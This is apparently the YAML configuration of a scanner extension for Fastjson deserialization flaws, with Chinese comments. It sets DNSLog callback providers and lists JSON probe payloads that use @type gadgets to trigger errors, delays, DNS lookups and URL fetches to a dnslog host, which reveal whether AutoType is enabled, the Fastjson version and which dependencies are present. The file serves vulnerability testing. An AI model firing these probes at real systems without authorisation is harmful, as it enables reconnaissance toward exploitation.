# dnsLog模块
dnsLogModule:
  # 提供商
  # 声明使用 DnsLogModule.ExtensionMethod 的哪个类,为该扩展提供服务
  # 目前集成方法:
  # DnsLogCn = http://dnslog.cn的接口
  # BurpDnsLog = burp自带的dnslog接口
  # Ceye = http://ceye.io的接口
  provider: "DnsLogCn"
  # 其它数据,用于一些需要验证接口取值使用的
  # 注意: key=value;为一个参数
  # 例如:
  # a=1; b=2; c=3;
  # Ceye的配置等于: token=xxx;Identifier=xxxx.ceye.io;
  other: "token=;Identifier=xxx.ceye.io;"
# payload模块
payloadModule:
  DetectError:
    description: "报错检测(返回500或响应包含报错信息)"
    payloads:
      - "{\"@type\": \"java.lang.AutoCloseable\""
      - "{\"name\": \"hello\", \"age\": 2\""
      - "{\"@type\": \"whatever\"}"
  DetectDnsLog:
    description: "出网检测(DnsLog收到请求即出网)"
    payloads:
      - "{\"name\":{\"@type\":\"java.net.Inet4Address\",\"val\":\"${dnslog}\"}}"
  DetectDelay:
    description: "延迟检测"
    payloads:
      - "{\"regex\":{\"$ref\":\"$[blue rlike '^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$']\"},\"blue\":\"aaaaaaaaaaaa${value}!\"}"
  DetectAutoType:
    description: "AutoType检测(DnsLog收到请求即AutoType开启)"
    payloads:
      - "{\"name\":[{\"@type\":\"java.net.CookiePolicy\"},{\"@type\":\"java.net.Inet4Address\",\"val\":\"${dnslog}\"}]}"
  DetectVersionByDnsLog:
    version48:
      description: "Fastjson < 1.2.48"
      payloads:
        - "{\"name\":[{\"@type\":\"java.lang.Class\",\"val\":\"java.io.ByteArrayOutputStream\"}, {\"@type\":\"java.io.ByteArrayOutputStream\"}, {\"@type\":\"java.net.InetSocketAddress\"{\"address\":,\"val\":\"48.${dnslog}\"}}]}"
    version68:
        description: "1.2.48 ≤ Fastjson ≤ 1.2.68"
        payloads:
          - "{\"a\":{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"com.alibaba.fastjson.JSONReader\",\"reader\":{\"@type\":\"jdk.nashorn.api.scripting.URLReader\",\"url\":\"http://68.${dnslog}\"}}}"
    version8083:
      description: "1.2.69 ≤ Fastjson ≤ 1.2.80"
      payloads:
        - "{\"name\":[{\"@type\":\"java.lang.Exception\",\"@type\":\"com.alibaba.fastjson.JSONException\",\"x\":{\"@type\":\"java.net.InetSocketAddress\"{\"address\":,\"val\":\"80.${dnslog}\"}}},{\"@type\":\"java.lang.Exception\",\"@type\":\"com.alibaba.fastjson.JSONException\",\"message\":{\"@type\":\"java.net.InetSocketAddress\"{\"address\":,\"val\":\"83.${dnslog}\"}}}]}"
  DetectDependency:
    description: "依赖检测(根据报错内容判断)"
    DependencyList:
      - "org.springframework.web.bind.annotation.RequestMapping"
      - "org.apache.shiro.jndi.JndiObjectFactory"
      - "org.apache.catalina.startuo.Tomcat"
      - "groovy.lang.GroovyShell"
      - "com.mysql.jdbc.Driver"
      - "java.net.http.HttpClient"
    payloads:
      - "{\"@type\":\"java.lang.Character\"{\"@type\":\"java.lang.Class\",\"val\":\"${dependency}\"}"
